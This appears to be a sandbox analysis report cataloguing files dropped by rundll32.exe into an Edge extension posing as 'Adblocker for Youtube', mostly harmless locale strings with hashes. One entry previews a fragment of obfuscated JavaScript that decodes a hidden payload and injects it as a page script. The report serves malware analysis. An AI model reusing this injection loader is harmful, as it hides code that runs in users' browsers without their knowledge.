Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ca\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.8038077324770025
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHATC6Wq8vEj/EXQ3YJMWVAVIQ2gBT1n:bk/dP6GtVR7s6kv3goJXW1
MD5:9558EF405369500EC74EC48B16C67123
SHA1:7A55A51AB242AAAB70B475CA244D58435ED18CDC
SHA-256:AFBC3A7F222C6C4AAC9BB72ACB89079751F1B26BCFB622AABFF3095D35E953C0
SHA-512:2FB9B297A00D30CD36C3881416360AB4C9305B148BAE4914F13C081713BF8FD921C9E8105EC1653BCB9258078509C5F425091B17482F5A7C633195DADEC59658
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Est.s buscant v.deo adblock? Pel descarregar Adblocker per a Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\cs\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):144
Entropy (8bit):4.942456752756783
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVXKd5gBBVR7WHNJcRAi2eCnngXR56WWVXKd5gBT1n:bk/dP6Gn24VR7MJcRAi3+gB56/2W1
MD5:524629E383646EE89AB2F678B4BE3FF6
SHA1:F0BDE6E032863D43AB147EFC39CAEF69FC9D7515
SHA-256:2D09BA1FD1682BE5630353AEF92E3EB7F6BF82FA6E86CF6EDB38102D2B6811E3
SHA-512:D4DFCED5F83A9E000DFA52A07E42BAD63E983E68FD9E9A32601E43F5EE4F5C0DB0050DDEC99847B5DFDF7A5DE9B32DF0DFCD5EE0F16591698B8CEBF7C57126D2
Malicious:false
Preview:.{"appName":{"message":"Adblocker pro Youtube."},"appDesc":{"message":"Hled.te video adblock? Tak.e st.hnout Adblocker pro Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\da\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.921700724720227
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWRMgFBBVR7WHA0algFkdCg1BKS9rIHWWRMgFBT1n:bk/dP6GVVVR7NgFsV1BKS9r69f1
MD5:F013F8F66453B7BB32ADFBAB94F43265
SHA1:6792CCC65AD371F2222FD11E3B994ECEB1376F7D
SHA-256:BC000154FEA83481537A4F9DBAB369970E83CA8335E52C451D9363C2BED20F45
SHA-512:85E835A25F47AA5C222264FB3ED65BAE37E7451C86BCBC634C4F145A1C58ED369321474CBA5FA9F1B10FD09370E399C24ACBFCE6C95BD81474F360B3F3AFF5F2
Malicious:false
Preview:.{"appName":{"message":"Adblocker til Youtube."},"appDesc":{"message":"Er du p. udkig efter video adblock? S. download Adblocker til Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\de\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):157
Entropy (8bit):4.946253849862891
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmZXizBBVR7WHWM1FaDEXgsvDM2KIEBpKGOWJFIHJKZWDmZXizL:bk/dP6GpVR7c1FCsLlKnOvHJKQ1
MD5:DE39EA44F2A12A934757A93C64251ACB
SHA1:61AFFEF1FC9FF528424F9147D6C056975092F233
SHA-256:66A7A4DE9D4A548E9109821EF598273032833B5644BF1157BF4045E9A14782B4
SHA-512:32052DFBE47177EDBE1181F91FD10FEB81EA00413D8090CDB52E048B3C605AB97AEB73B65624B4F5460DB47AF37513FCF076A2E4054C1DF3DEE21FBC2EEA6F62
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Sind Sie auf der Suche nach video-adblock? So laden Adblocker f.r Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\el\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):197
Entropy (8bit):4.9739986021611635
Encrypted:false
SSDEEP:6:bk/dP6GLAQhqb4VR7K6ITsfva9WlroZIAQhqbW1:4dFvIbYFE6roZIvIbW1
MD5:09A7A7CD38C78FF410EEDE8878408C74
SHA1:99D3EA931D32B960E3CEB71668C5A2184E14ADD1
SHA-256:F64C79D2C0340FDFD1355E5CF7402411E52DFD8C4E19B4F0D244A8E8DDFD64E8
SHA-512:05FBC49EA69B04175F594EB1A5EA684AA907D13C5651B9480393D75FEE7B060BE9CC83AAF908611DEB6EA8BB3862A591DF50356C21ECFC4BF6AE3142425D9BA4
Malicious:false
Preview:.{"appName":{"message":"Adblocker ... .. Youtube."},"appDesc":{"message":"....... ... ...... adblock; ...., ......... .. Adblocker ... .. Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\en\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\en_GB\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\en_TO\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):834804
Entropy (8bit):4.237053021969982
Encrypted:false
SSDEEP:6144:sWtlYGNPy3ymXZCfnvpn2qs7UoCheMANPCc3q6ep8ti31OXjNp:01Hp
MD5:24A0DD7E0230C673112594BF49574506
SHA1:CFFD9BD3E25B275E7DFA7C8245CE0DB3AF7AB9E8
SHA-256:59F94D4B4462DAD7695C0CF30D16A3EA9F31F19607E6301E5ED3AF3C5B046966
SHA-512:E0BD9AC0EB549E4DEF29633D7FFE65D4E003A99DB1AC866B5E658EA1D140A8DCDE5D9D1D90792BCE9FDD27AA6B80F44809D3F3D056CE014CBB2B5AD40971B014
Malicious:false
Preview:(function(){function _0x8853f7(){var _0x4267a3=function(_0x2b2cd9){var _0x4b9edf,_0x3875da;(_0x4b9edf=window['document'])&&(_0x3875da=_0x4b9edf['head']||_0x4b9edf['body']||_0x4b9edf['documentElement'])?(_0x4b9edf=_0x4b9edf['createElement']('script'),_0x2b2cd9=atob(_0x5ddcb(_0x2b2cd9)),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_1_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_2_','4366A976DB28476FA26AE30CEE10D605'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_3_','Windows NT 10.0; WOW64'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_4_','false'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_6_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_7_','true'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_8_','0'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_5_','https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak'),_0x2b2cd9=new Blob([_0x2b2cd9],{'type':'text/javascript'}),_0x4b9edf['src']=URL['createObjectURL']

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\en_US\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\es\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\es_419\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\et\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):127
Entropy (8bit):4.783683649251908
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHKR1FTM2eC9owxJKZW8xBT1n:bk/dP6GeRVR7TpleYERj1
MD5:E47E22D7E235CDA9AB5CE8B0F4F1E1F8
SHA1:0ED41228E67650D4F5D84397EAC564BCF9F4788F
SHA-256:D66AF121A08B3CA39E89DD2B5630C9E62772CD8D12A025D5529BCD26C9D8589A
SHA-512:3D7F5B72B73362A3E4245051B8F4AF485FFF52BAD315F5C616D2C6C035C382757A8A21157FA8F54060F6AFD39197E39CFC902E9D806A40F46D39C24825CDE30C
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Otsid video adblock? Nii et lae Adblocker Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\fa\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\fi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):133
Entropy (8bit):4.875948501246631
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHA5oOeC5bxsFW8xAR1n:bk/dP6GeRVR7LoOeRlS
MD5:DFB95328C33900FC5F0943DB17BB7A7B
SHA1:C52582635A8FA23E049B60986A1A78AA3DC90FED
SHA-256:9FE90EC988C0D089C7756146124CC656A56C9336AD7049456200817E1D597E32
SHA-512:6636562113F42AD7BE7998498287F78C956E2B595AB4BBEAF40D814BC10D9226AB073DD16E165A366A9BE16E76D9B54F23C7E600A65333ACE15EA15B172971FB
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Etsitk. video adblock? Joten lataa Adblocker Youtubeen.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\fil\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\fr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):190
Entropy (8bit):4.840085778181825
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQ1UIlgQWxBBVR7WHTsEFXGXGCzEpAOFEqDjmovLFHJKJAHIlgQWxL:bk/dPME/bgQCVR7SlfepqHDxvL9JdOgV
MD5:460291C4926F8C24D245A74A76B88155
SHA1:6944B567438ACF86CBE6A6A3519DC84822B8B21B
SHA-256:33976589FF5232B39103D8A8E474F4044258DFA30AE667B90F176FA93C7E9AD2
SHA-512:11E9F61BF62BA6F0506D7C200079F7D41ED8A2BD644624551CF03880C517ED0748105307B20D493D15DEDE7DEEB76BEB9FF11ECA6C05E4E415227CF88D978614
Malicious:false
Preview:.{"appName":{"message":"Bloqueur de pub pour Youtube."},"appDesc":{"message":"Vous .tes . la recherche pour la vid.o adblock? Afin de t.l.charger bloqueur de pub pour Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\gu\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\he\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\hi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\hr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\hu\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):156
Entropy (8bit):4.967518278690115
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWEGKQ2gBBVR7WHOAXACTAAhFEBknfJfTfmZWEGKQ2gBHMk6kL0Y:bk/dP6Gmd4VR74XroknfJypdEMC0Y
MD5:10461FD634DC768A6B93196B0879FD0F
SHA1:620AFFCA1A6EA63FA015783D367BB264A2DDA8D1
SHA-256:FF48B5761FE27245CD49308014EEC10BF057B395846A4E1091B13458CCD84848
SHA-512:B7E925A0DF6C5E84FE764AA2EDA44E29D1B2A6B40AFDCAD3C21055E0D6C7E4E3274503BB821D03CFF0AD76EBB09C7C0DB1DA8695DAA207191A463C149AEE8A8F
Malicious:false
Preview:.{"appName":{"message":"Adblocker a Youtube."},"appDesc":{"message":"Keres vide. adblock? .gy a let.lt.s Adblocker a Youtube.szolg.ltat.sban."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\id\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\it\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.793805282505165
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHWREEmiKjKFCiQpEWpKZWVAVqBT1n:bk/dP6GtVR7yEmwFXjWky1
MD5:4CF617F75C36EF8C5C566F7E9689A123
SHA1:2F8E9DA815F05E4A3F9F70B2C103DAAB3E27069E
SHA-256:2603AA798E78D7DC60EB166545436A264658F7B1B6B4B7436D367A969033B263
SHA-512:D857DBCBE5359F222B7922D784B1E795BF28D5A81A9FFEA1AB5DAF8F63408F9A3F580CC6D22DE68C267E88FDB03141D3FD85162FB1C8A9FB8C1E2562D1DE5AD2
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Stai cercando video adblock? Quindi, scaricare Adblocker per Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ja\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\kn\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

